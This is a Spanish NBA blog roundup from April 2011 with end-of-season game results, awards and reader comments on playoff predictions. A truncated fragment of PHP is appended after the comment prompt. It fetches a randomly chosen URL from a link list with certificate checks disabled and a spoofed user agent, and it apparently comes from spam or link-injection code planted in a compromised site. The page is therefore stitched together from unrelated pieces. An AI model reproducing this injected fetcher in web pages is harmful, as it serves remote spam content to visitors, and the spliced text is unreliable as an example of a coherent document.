La Crónica (10/04/2011)

11 de April de 2011 por TheDeerHunter

Algunos consideramos que las últimas semanas de la regular season son el reflejo fiel de lo que le espera a cada equipo en los playoffs. Y lo consideramos con tanta fuerza que casi constituye para nosotros un axioma en la dinámica de la liga. Los arbitrajes cambian, las defensas se endurecen, los sistemas se ajustan, los cuerpos se afinan, la motivación se renueva… Tras una jornada de duelos directos como la de anoche parecemos tener ya algunas directrices definidas de cara a las eliminatorias.

Ni Boston ni Lakers repetirían candidatura. Ambos se vieron impotentes ante la pujanza de dos gallitos como Miami (77-100) y Oklahoma (120-106), respectivamente). La incapacidad ofensiva y los defectos bajo los aros, por un lado, y una defensa de risa y una ausencia total de implicación por el otro, resultan más que preocupantes. La recta final de los dos últimos finalistas es infame y vergonzosa, impropias de un verdadero candidato. En la práctica simplemente les complica el cuadro. Si esto supone al final una simple molestia para ellos la importancia de la regular queda excesivamente en entredicho. Igual debería empezar a contemplarse algún ajuste al respecto.

Derrick Rose llega con ganas de armarla. Anoche ratificó su favoritismo a MVP destrozando sin piedad a Orlando Magic (102-99). Si atendemos simplemente a las últimas rachas, los Bulls serían ahora mismo los máximos candidatos al anillo. En cambio, si consideramos que con una monstruosa actuación de Rose y sin Howard delante, sufrieron para doblegar a unos Magic bastante poquita cosa, ya no queda tan claro.

Siguiendo con la línea de las actuales sensaciones, pocos las transmiten tan buenas como los Knicks y como los Grizzlies. Melo, sin Stat, ajustició a la versión mala (y más habitual) de unos Pacers carne da cañón (110-109). También lo parecen a días los Hornets, los cuales fueron arrollados por los Grizzlies (89-111). Más allá de días, de apariencias y de rachas, la verdad es una clasificación que a todos ellos les pone fecha de caducidad dentro de las próximas tres semanas. Todo esto vuelve a subir a la palestra la fiabilidad de cualquier impresión que tengamos establecida.

El resto de la jornada tenía menos jugo. Unos Mavs sin brillo destrozaron a los Suns y empatan con los amarillos en la 2ª plaza del Oeste (90-115). Toronto ganó a New Jersey a pesar de que Lopez agarró rebotes (92-99), Detroit ganó a Charlotte con Stuckey ejerciendo de líder maldito (112-101) y los Warriors se llevaron derrota y susto contra Sacramento (104-103). Monta Ellis se pegó un leñazo escalofriante de cabeza contra el suelo.

PREMIOS

MVP: Una delicia. Ver a Derrick Rose atacar el aro es una auténtica delicia. Anoche nos volvió a ofrecer otra exhibición de 39 puntos y 5 asistencia frente uno de los grandes. De su mano, los Bulls aspiran a todo.

Rookie: Los Raptors parecen haber encontrado el sustituto de Chris Bosh. Ed Davis se fue anoche a los 18 puntos, 8 rebotes y 3 tapones.

Sorpresa: Ryan Anderson fue el mejor de los Magic en su derrota frente los Bulls. Doble-doble de 28 puntos y 10 puntos.

Decepción: Los 2 finalistas del año pasado no pasan un buen momento. Los Lakers encadenan 5 partidos seguidos perdiendo y los Celtics cayeron estrepitosamente frente los Heat. En el apartado individual Chris Paul se quedó sin anotar por primera vez en su carrera.

Esfuerzo en vano: Brook Lopez está enorme a nivel anotador en los últimos partidos (35 puntos anoche) y anoche, además, fue capaz de capturar 11 rebotes, toda una hazaña para él. Eso sí, exceptuando al mismo Lopez, el quinteto titular de los Nets es totalmente deprimente.

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Nuevo Buzzer Beater de Carmelo. Yo sigo afirmando que es el mejor jugador clutch de la liga, aunque Deer diga que estoy vendiendo moto.

      Citar

  2. Vader dice:
    #2

    Ya van 7 seguidas de los Knicks!!!

      Citar

  3. Nacho dice:
    #3

    Una final Lakers-Celtics, dejaría a este post entre los incunables de “El nombre de la rosa”.
    No te preocupes Deer, es lo que le pasa a la buena literatura, que siempre falla en sus predicciones. Pero sigue siendo buena.
    Yo apuesto (deseo) por unas finales como las del año pasado. Ahí está todo dicho, el que menos puntos tendrá de la porra, (yo), vaticinando la final soñada.

      Citar

  4. TheDeerHunter dice:
    #4

    Jejeje…
    Es lo que me temía, aunque no me lo temía tan pronto, Nacho.

    En mi defensa te confesaré que el post ha cambiado completamente el sentido que yo quería darle originalmente en manos de mi amadísimo editor.

    En realidad, aunque quizás no he sido capaz de transmitir y mucho menos tras cierta corrección buscando claridad, lo que yo quería confrontar es la realidad de lo que son las cosas y cómo creemos que deberían ser. En este caso decir que Laker y Celtics dejan de ser candidatos es todo lo contrario que buscaba decir.
    Lo que yo pongo en duda es la premisa de que nos encontramos a muchos efectos en “modo playoff” y más aún… si la temporada regular finalmente sirve para un carajo.
    Dependiendo de cómo se desarrollen los acontecimientos este año la segunda parte de la frase cobra especial sentido.

      Citar

  5. Txusma dice:
    #5

    Presente el “amadísimo” editor 😀

    Pues venga, yo apuesto por un Bulls-Thunder en la final con un par. Cansado ya de tanto Lakers y tanto Celtics estoy…

      Citar

  6. busky23 dice:
    #6

    Di que si Deer,hay que dar estopa tanto a los Celtics como a Lakers,especialmente a estos ultimos. Independientemente de que se repita la final es tan descarada la desidia mostrada por Lakers esta temporada en muchos tramos de la misma que se hace inevitable el calificar su juego de infame y vergonzoso.
    Ya lo dijo Phil Jackson hace unos dias “Estos tios simplemente no quieren jugar duro ahora mismo”….lo dicho,de verguenza. No es la mejor manera de afrontar los durísimos playoffs que se les avecinan.

    Un lujo este Rose,es increible la mejora de un año a otro,sobretodo en el tiro de 3, mostrando una regularidad increible en una temporada donde prácticamente todos los equipos han tenido algún bajón llevando a los Bulls del octavo puesto al primero.MVP por unanimidad. Nadie apuesta por ellos…craso error.

    Muy complicado hacer apuestas este año en playoff,muy complicado.

      Citar

  7. Javijaen dice:
    #7

    Buenas tardes señores, ya estamos con lo del modo playoff… jejeje. Bueno, a lo mío, que acabo de ver a los Knicks sufriendo mucho para ganar a Pacers. No estoy de acuerdo con que fuera la “versión mala” de los Pacers, ya que estuvieron ganando a 6 minutos por 6 y poco antes de 11. Los Knicks tuvieron que tirar mucho de Melo, que en el último cuarto se metió 2 triples seguidos de esos que le gustan y el tiro final ganador. Billups estuvo bien, pero debe afinar, y Fields debe entrar más en juego. El resto, en su (mala) línea (hasta Turiaf cogió algún rebote). Eso sí, sin Amaré estos dos últimos partidos.
    Por cierto, que actualmente el rival es Celtics, así que no se podrá eliminar a “The Chosen One” en primera ronda…
    Sobre el quinteto de Nets, habría que extenderlo a toda la plantilla, que menos Brook Lopez el resto no jugaría ni en Europa… Un saludo!!

      Citar

  8. Vader dice:
    #8

    Lo siento mucho por los anti-Heat del foro… A los Knicks les tocara eliminar a Celtics en primera ronda…

    :))

    Saludos!!

      Citar

  9. Len Bias dice:
    #9

    Hombre Javijaen… Deron sería titular en casi todos los equipos de la liga y Humphries en muchos

      Citar

  10. CAMPO2 dice:
    #10

    Yo creo que a Deron Williams le dejarian juagar en algun equipo de europa, aunque fuese los minutos de la basura

      Citar

  11. Denise dice:
    #11

    Yo que soy un visionario, os digo que la final va a ser un Lakers-Heat. Los Lakers ganan cuando le sale de los webos, cuando le ponen ganas, barren, y cuando juegan al 50% (como vs Jazz, Blazers, Nuggets, Thunder, Warriors) tienen opciones hasta los últimos 5 minutos o menos.
    Y a los Heat los veo muy superior en el Este.

      Citar

  12. Cocinitas dice:
    #12

    Three-peat señores!!! Aunque solo sea por no romper la estadistica del tio Phil 🙂

      Citar

  13. Vader dice:
    #13

    Si, yo hablando en serio tambien apuesto por los Lakers. Bryant sigue siendo muy bueno y por dentro Gasol, Bynum y Odom son mucha tela… más la aportación de Artest, Barnes la experiencia de Fisher, etc…

    Ojala se crucen con los Thunder, creo que seria una eliminatoria preciosa y casi, casi una final anticipada.

    Saludos

      Citar

  14. KB # 24 dice:
    #14

    jajaja sois la monda! todo el mundo raja de los lakers pero casi todos los vemos campeones!

      Citar

  15. Javijaen dice:
    #15

    @Len Bias y @CAMPO2: Es cierto, pero el otro día vi Nets-Knicks y, sin Deron Williams que desgraciadamente estaba lesionado, y sin Humphries, y con Melo ahorrándose casi medio partido, era Brook Lopez contra el mundo. De verdad que fue una pena como Farmar se convertía en el segundo mejor jugador del partido, y para ver las estadísticas. Obviamente, hablaba con respecto a lo visto sin estos dos jugadores, lamento haber herido sensibilidades… Un saludo!!

      Citar

  16. max dice:
    #16

    Como fan laker, prefiero unos cruces con SAS o DAL sin ventaja de campo que tener enfrente a OKC con el desempate en casa. A los Thunder no los quiero para nada, aunque estoy con Vader en que seria una eliminatoria preciosa y muy emocionante.

      Citar

  17. Len Bias dice:
    #17

    Aviso, creo que importante para el que no lo sepa:

    Está abierto gratis el NBA League Pass hasta el día 15 de abril

    (He de decir que es una maravilla, igual lo compro)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>